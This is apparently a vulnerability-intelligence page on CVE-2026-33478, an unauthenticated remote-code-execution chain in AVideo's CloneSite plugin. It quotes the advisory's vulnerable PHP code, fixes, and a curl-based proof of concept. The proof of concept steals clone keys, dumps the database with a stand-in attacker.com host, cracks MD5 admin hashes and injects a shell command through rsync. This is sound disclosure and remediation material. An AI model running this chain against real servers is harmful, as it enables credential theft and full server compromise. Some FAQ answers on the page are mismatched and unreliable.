What is the CVSS score of CVE-2026-33478?

CVE-2026-33478 has a CVSS 3.1 base score of 10.0 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. EPSS exploitation probability: 3.0%.

Which versions of PHP are affected by CVE-2026-33478?

A critical zero-day vulnerability in AVideo's CloneSite plugin enables unauthenticated attackers to completely compromise affected systems, steal admin credentials, and execute arbitrary commands.. A patch is available.

Is there a public PoC exploit available for CVE-2026-33478?

Yes, a public proof-of-concept exploit is available for CVE-2026-33478. Prioritise patching immediately. EPSS: 3.0%.

How to fix or mitigate CVE-2026-33478?

Within 24 hours: Immediately disable the CloneSite plugin on all AVideo installations and verify no unauthorized access has occurred by reviewing authentication logs. Within 7 days: Audit all AVideo instances to identify whether the plugin was enabled and assess potential compromise; if compromise is suspected, initiate incident response including credential rotation for all admin accounts. Within 30 days: Remove the CloneSite plugin entirely, apply any available security updates to AVideo core, and implement network-level monitoring to detect exploitation attempts.

PHP CVE-2026-33478

EUVD-2026-14175 CRITICAL

OS Command Injection (CWE-78)

2026-03-20 https://github.com/WWBN/AVideo

GHSA-687q-32c6-8x68

GHSA-gv9p-wq55-477w

GHSA-p747-qc5p-773r

GHSA-wc83-79hj-hpmq

GHSA-xggw-g9pm-9qhh

RCE Command Injection PHP

10.0

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

10.0 CRITICAL

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Patch released

Mar 31, 2026 - 21:13 nvd

Patch available

EUVD ID Assigned

Mar 20, 2026 - 20:46 euvd

EUVD-2026-14175

Analysis Generated

Mar 20, 2026 - 20:46 vuln.today

CVE Published

Mar 20, 2026 - 20:43 nvd

CRITICAL 10.0

DescriptionGitHub Advisory

Summary

Multiple vulnerabilities in AVideo's CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The clones.json.php endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via cloneServer.json.php. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in cloneClient.json.php to execute arbitrary system commands.

Details

Step 1: Clone Key Disclosure

plugin/CloneSite/clones.json.php:1-8 has zero authentication:

php

<?php
require_once '../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/CloneSite/Objects/Clones.php';
header('Content-Type: application/json');
$rows = Clones::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

The response includes the key field for every registered clone, which is the sole authentication credential for clone operations.

Step 2: Database Dump via Stolen Key

plugin/CloneSite/cloneServer.json.php:73-97 - once the key passes Clones::thisURLCanCloneMe(), the server executes mysqldump and writes the result to a web-accessible directory:

php

$cmd = "mysqldump -u {$mysqlUser} -p'{$mysqlPass}' --host {$mysqlHost} "
    ." --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} > $sqlFile";
exec($cmd . " 2>&1", $output, $return_val);

The SQL file path is returned in the JSON response and is downloadable.

Step 3: Admin Credential Extraction

objects/user.php:1798 - passwords are stored as unsalted MD5:

php

$passEncoded = md5($pass);

The users table in the dump contains user, password (MD5), and isAdmin fields. MD5 hashes crack in seconds.

Step 4: Command Injection via Rsync

plugin/CloneSite/cloneClient.json.php:259 - the videosDir from the clone server response is interpolated unsanitized into the rsync command:

php

$rsync = "sshpass -p '{password}' rsync -av ... {$objClone->cloneSiteSSHUser}@{$objClone->cloneSiteSSHIP}:{$json->videosDir} ...";
exec($cmd . " 2>&1", $output, $return_val);

An admin who controls a clone server (or an attacker who has become admin) can inject arbitrary commands via the videosDir field.

PoC

bash

# Step 1: Steal clone keys (unauthenticated)
curl -s 'http://target/plugin/CloneSite/clones.json.php' | jq '.data[0].key'
# Output: "a1b2c3d4e5f6..."
# Step 2: Trigger database dump
CLONE_KEY="a1b2c3d4e5f6..."
curl -s "http://target/plugin/CloneSite/cloneServer.json.php" \
  --data "url=http://attacker.com&key=${CLONE_KEY}&useRsync=0" | jq '.sqlFile'
# Output: "Clone_mysqlDump_1234567890.sql"
# Step 3: Download the dump and extract admin credentials
curl -s "http://target/videos/clones/Clone_mysqlDump_1234567890.sql" \
  | grep -A2 "INSERT INTO.*users" \
  | grep -oP "admin','[a-f0-9]{32}"
# Output: admin','5f4dcc3b5aa765d61d8327deb882cf99  (MD5 of "password")
# Step 4: Crack MD5 (trivial)
echo -n "5f4dcc3b5aa765d61d8327deb882cf99" | hashcat -m 0 -a 0 rockyou.txt
# Output: password
# Step 5: Login as admin, configure CloneSite with malicious server
# The attacker's clone server returns videosDir containing: /tmp$(id > /tmp/pwned)
# When rsync executes, the $(id) is evaluated by the shell

Impact

Complete server compromise: Unauthenticated attacker achieves arbitrary command execution as the web server user
Full database disclosure: The entire database (users, videos, configurations, secrets) is exfiltrated
No user interaction: Every step is automated, no clicks or social engineering required
Credential theft: All user passwords (MD5) are trivially recoverable
Lateral movement: Database credentials and SSH credentials (stored encrypted in the plugins table) may enable access to other systems

Recommended Fix

Add authentication to clones.json.php:

php

// plugin/CloneSite/clones.json.php
require_once '../../videos/configuration.php';
if (!User::isAdmin()) {
    http_response_code(403);
    die(json_encode(['error' => true, 'msg' => 'Admin required']));
}

Don't store SQL dumps in web-accessible directories - use a path outside the web root or require re-authentication to download.
Upgrade password hashing - replace MD5 with password_hash() (bcrypt/argon2):

php

// Replace: $passEncoded = md5($pass);
$passEncoded = password_hash($pass, PASSWORD_DEFAULT);

Sanitize rsync command parameters - use escapeshellarg() on all interpolated values:

php

$rsync = sprintf("rsync -av ... %s@%s:%s ...",
    escapeshellarg($objClone->cloneSiteSSHUser),
    escapeshellarg($objClone->cloneSiteSSHIP),
    escapeshellarg($json->videosDir)
);

AnalysisAI

A critical authentication bypass and command injection vulnerability chain in AVideo's CloneSite plugin allows completely unauthenticated remote attackers to achieve full system compromise. The vulnerability affects AVideo installations with the CloneSite plugin enabled, allowing attackers to steal clone authentication keys, dump the entire database including MD5-hashed admin credentials, crack those credentials trivially, and finally execute arbitrary system commands via an rsync command injection. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Access clones.json.php endpoint

Delivery

Extract unauthenticated clone secret keys

Exploit

Trigger database dump via cloneServer.json.php

Install

Crack MD5 admin password hashes

Authenticate as admin

Execute

Inject OS commands in rsync construction

Impact

Execute arbitrary system commands

Recon

Access clones.json.php endpoint

Delivery

Extract unauthenticated clone secret keys

Exploit

Trigger database dump via cloneServer.json.php

Install

Crack MD5 admin password hashes

Authenticate as admin

Execute

Inject OS commands in rsync construction

Impact

Execute arbitrary system commands

Vulnerability AssessmentAI

Exploitation	AVideo with CloneSite plugin enabled (default installation). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	This vulnerability represents a critical real-world threat with maximum CVSS 10.0 scoring across all dimensions: network-accessible (AV:N), low complexity (AC:L), no privileges required (PR:N), no user interaction (UI:N), and changed scope (S:C) with high impact to confidentiality, integrity, and availability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An unauthenticated attacker scans the internet for AVideo installations and issues a GET request to /plugin/CloneSite/clones.json.php, obtaining valid clone authentication keys without any credentials. Using a stolen key, the attacker triggers a full database dump via cloneServer.json.php and downloads the resulting SQL file from the web-accessible /videos/clones/ directory, extracting admin password hashes. …
Remediation	Immediately apply patches referenced in the GitHub security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68 or upgrade to a patched version of AVideo once available from the official repository at https://github.com/WWBN/AVideo. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Immediately disable the CloneSite plugin on all AVideo installations and verify no unauthorized access has occurred by reviewing authentication logs. …

Threat intelligence, references, and detailed analysis are available after sign-in.